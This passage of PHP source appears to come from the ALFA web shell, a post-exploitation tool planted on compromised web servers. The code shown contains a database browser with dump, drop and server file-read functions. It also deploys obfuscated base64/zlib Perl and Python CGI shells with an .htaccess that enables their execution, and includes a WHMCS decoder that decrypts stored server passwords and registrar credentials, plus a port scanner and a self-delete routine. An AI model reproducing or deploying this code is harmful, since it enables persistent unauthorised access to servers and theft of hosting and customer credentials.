5772$tbls_res = $db->listTables();
5773while($item = $db->fetch($tbls_res)){
5774list($key, $value) = each($item);
5775if(!empty($_POST['sql_count']))
5776$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
5777$value = htmlspecialchars($value);
5778echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a class='db-opt-id' href='javascript:void(0);' onclick=\"fs('0','".$value."',this)\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
5779}
5780echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4',null,this);\" class='button db-opt-id'> <input type='button' value=' Drop ! ' onclick=\"fs('5',null,this);\" class='button db-opt-id'></p><div class='txtfont'>File path:</div><input type='text' class='dumpfile-value db-opt-id' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
5781if(@$_POST['alfa1'] == 'select'){
5782$_POST['alfa1'] = 'query';
5783$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
5784$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
5785$num = $db->fetch();
5786$pages = ceil($num['n'] / 30);
5787echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
5788echo " of $pages";
5789if($_POST['alfa3'] > 1)
5790echo " <a href='javascript:void(0);' class='db-opt-id' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]',this)>< Prev</a>";
5791if($_POST['alfa3'] < $pages)
5792echo " <a href='javascript:void(0);' class='db-opt-id' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]',this)>Next ></a>";
5793$_POST['alfa3']--;
5794$cache_table = $_POST['alfa2'];
5795if($_POST['type']=='pgsql')
5796$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
5797else
5798$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
5799echo "<br><br>";
5800}
5801if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
5802$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
5803$db->query(@$_POST['alfa2']);
5804if($db->res !== false){
5805$title = false;
5806echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
5807$line = 1;
5808while($item = $db->fetch()) {
5809if(!$title){
5810echo '<tr><th>#</th>';
5811foreach($item as $key => $value){
5812echo '<th>'.$key.'</th>';
5813}
5814reset($item);
5815$title=true;
5816echo '</tr><tr>';
5817$line = 2;
5818}
5819if($cache_table!=''){
5820 $cacheMsg = '<a class="db-opt-id" href="javascript:void(0);" onclick="fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\', this)">Edit</a>';
5821}else{
5822 $cacheMsg ='-';
5823}
5824echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
5825$line = $line==1?2:1;
5826foreach($item as $key => $value){
5827if($value == null)
5828echo '<td><i>null</i></td>';
5829else
5830echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5831}
5832echo '</tr>';
5833}
5834echo '</table>';
5835} else {
5836echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5837}
5838}
5839echo('</form>');
5840if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
5841$data = explode(':',$_POST['alfa3']);
5842echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
5843echo("<form class='db-opt-id' act='update' onsubmit='fsu(this);return false;'><table border='1'>");
5844if($data[1] != '0'){
5845$data[2] = __ZGVjb2Rlcg($data[2]);
5846$data[2] = str_replace('"','',$data[2]);
5847$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
5848$fetch['__ALFAKEY'] = $data[1];
5849$fetch['__ALFAKEYVAL'] = $data[2];
5850}else{
5851$d = __ZGVjb2Rlcg($data[2]);
5852$fetch = json_decode($d, true);
5853}
5854foreach($fetch as $key => $value){
5855if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
5856$value = htmlspecialchars($value);
5857echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5858}
5859echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
5860}
5861if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
5862$data = json_decode($_POST['alfa2'], true);
5863$alfadata = $data['__ALFADATA'];
5864$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
5865$keyval = array();
5866echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
5867echo("<form class='db-opt-id' act='update' onsubmit='fsu(this);return false;'><table border='1'>");
5868$set = '';
5869foreach($data as $key => $value){
5870if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5871if($data2['__ALFAKEY']==$key){
5872$keyval['__ALFAKEY'] = $key;
5873$keyval['__ALFAKEYVAL'] = $value;
5874}
5875$set .= "`$key` = '".addslashes($value)."',";
5876$value = htmlspecialchars($value);
5877echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5878}
5879unset($data['__ALFADATA']);
5880
5881echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
5882
5883if(!isset($data2['__ALFAKEY'])){
5884$where = '';
5885foreach($data2 as $key => $value){
5886if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5887$value = addslashes($value);
5888$where .= "`$key` = '$value' AND ";
5889}
5890$where = substr($where, 0, -4);
5891}else{
5892$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
5893}
5894$set = substr($set, 0, -1);
5895$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
5896if($db->error())
5897echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5898else echo("Success...!");
5899}
5900if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
5901echo "<p>Query:</p><form class='db-opt-id' onsubmit='fs(this, null, this);return false;'>
5902<input type='hidden' name='alfa1' value='query'/>
5903<textarea name='query' style='width:100%;height:100px'>";
5904echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
5905echo "</textarea><p><div style='float:left;'><input type=submit value=' '></div></p></form>";
5906}
5907echo "</td></tr>";
5908}
5909echo "</table></form><br/>";
5910if($_POST['type']=='mysql') {
5911$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
5912if($db->fetch())
5913echo "<form class='db-opt-id' onsubmit=\"fs('3',this.f.value,this);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
5914}
5915if(@$_POST['alfa1'] == 'loadfile'){
5916$file = $db->loadFile($_POST['alfa2']);
5917echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
5918}
5919}else{
5920echo htmlspecialchars($db->error());
5921}
5922echo '</div>';
5923alfafooter();
5924}
5925function alfaselfrm(){
5926if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5927echo(__pre().'<center>');
5928if(@unlink($GLOBALS['__file_path'])){
5929echo('<b>Shell has been removed</i> :)</b>');
5930}else{
5931echo 'unlink error!';
5932}
5933echo('</center>');
5934}
5935if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5936echo "<div class=header>";
5937echo "
5938<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5939echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5940echo '</p></center></div>';
5941}
5942}
5943function alfacgishell(){
5944alfahead();
5945$div = "";
5946if(!in_array($_POST['alfa1'],array('perl','py'))){
5947$div = "</div>";
5948echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5949}
5950if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5951@mkdir('cgialfa',0755);
5952@chdir('cgialfa');
5953alfacgihtaccess('cgi');
5954$name = $_POST['alfa1'].'.alfa';
5955$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
5956$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5957if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5958if(__write_file($name,$code)){
5959@chmod($name,0755);
5960echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5961}
5962}
5963echo $div;
5964alfafooter();
5965}
5966function alfaWhmcs(){
5967alfahead();
5968echo '<div class=header>';
5969function decrypt($string,$cc_encryption_hash){
5970$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5971$hash_key = _hash($key);
5972$hash_length = strlen ($hash_key);
5973$string = __ZGVjb2Rlcg($string);
5974$tmp_iv = substr ($string, 0, $hash_length);
5975$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5976$iv = $out = '';
5977$c = 0;
5978while ($c < $hash_length)
5979{
5980$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5981++$c;
5982}
5983$key = $iv;
5984$c = 0;
5985while ($c < strlen ($string))
5986{
5987if (($c != 0 AND $c % $hash_length == 0))
5988{
5989$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5990}
5991$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5992++$c;
5993}
5994return $out;
5995}
5996function _hash($string)
5997{
5998if(function_exists('sha1'))
5999{
6000$hash = sha1 ($string);
6001}
6002else
6003{
6004$hash = md5 ($string);
6005}
6006$out = '';
6007$c = 0;
6008while ($c < strlen ($hash))
6009{
6010$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
6011$c += 2;
6012}
6013return $out;
6014}
6015AlfaNum(8,9,10);
6016echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
6017<input type='hidden' name='form_action' value='2'>";
6018$table = array('td1' =>
6019 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
6020 'td2' =>
6021 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
6022 'td3' =>
6023 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
6024 'td4' =>
6025 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
6026 'td5' =>
6027 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
6028);
6029create_table($table);
6030echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
6031if($_POST['alfa5']!=''){
6032$db_host=($_POST['alfa7']);
6033$db_username=($_POST['alfa3']);
6034$db_password=($_POST['alfa4']);
6035$db_name=($_POST['alfa5']);
6036$cc_encryption_hash=($_POST['alfa6']);
6037echo __pre();
6038$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
6039$query = mysqli_query($conn,"SELECT * FROM tblservers");
6040$num = mysqli_num_rows($query);
6041if ($num > 0){
6042for($i=0; $i <=$num-1; $i++){
6043$v = @mysqli_fetch_array($query);
6044$ipaddress = $v['ipaddress'];
6045$username = $v['username'];
6046$type = $v['type'];
6047$active = $v['active'];
6048$hostname = $v['hostname'];
6049echo("<center><table border='1'>");
6050$password = decrypt ($v['password'], $cc_encryption_hash);
6051echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
6052echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
6053echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
6054echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
6055echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
6056echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
6057echo "</table><br><br></center>";
6058}
6059$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
6060$num1 = @mysqli_num_rows($query1);
6061if ($num1 > 0){
6062for($i=0; $i <=$num1 -1; $i++){
6063$v = mysqli_fetch_array($query1);
6064$registrar = $v['registrar'];
6065$setting = $v['setting'];
6066$value = decrypt($v['value'], $cc_encryption_hash);
6067if ($value==""){
6068$value=0;
6069}
6070echo("<center>Domain Reseller <br><center>");
6071echo("<center><table border='1'>");
6072echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
6073echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
6074echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
6075echo "</table><br><br></center>";
6076}
6077}
6078}else{__alert('<font color="red">tblservers is Empty...!</font>');};
6079}
6080echo "</div>";
6081alfafooter();
6082}
6083function alfaportscanner(){
6084alfahead();
6085echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
6086<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
6087<input type="hidden" name="y" value="phptools">
6088<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
6089<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
6090<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
6091</form></center><br>';
6092$start = strip_tags($_POST['alfa2']);
6093$end = strip_tags($_POST['alfa3']);
6094$host = strip_tags($_POST['alfa4']);
6095if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
6096echo __pre();
6097$packetContent = "GET / HTTP/1.1\r\n\r\n";
6098if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
6099else{
6100$packetContent = str_replace(array("\r","\n"), "", $packetContent);
6101$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
6102}
6103for($i = $start; $i<=$end; $i++){
6104$sock = @fsockopen($host, $i, $errno, $errstr, 3);
6105if($sock){
6106stream_set_timeout($sock, 5);
6107fwrite($sock, $packetContent."\r\n\r\n\x00");
6108$counter = 0;
6109$maxtry = 1;
6110$bin = "";
6111do{
6112$line = fgets($sock, 1024);
6113if(trim($line)=="")$counter++;
6114$bin .= $line;
6115}while($counter<$maxtry);
6116fclose($sock);
6117echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
6118echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
6119}
6120flush();
6121}
6122}
6123echo '</div>';
6124alfafooter();
6125}
6126function alfacgihtaccess($m,$d='', $symname=false){
6127$readme = "";
6128if($symname){$readme="\nReadmeName ".trim($symname);}
6129if($m=='cgi'){
6130$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
6131}elseif($m=='sym'){
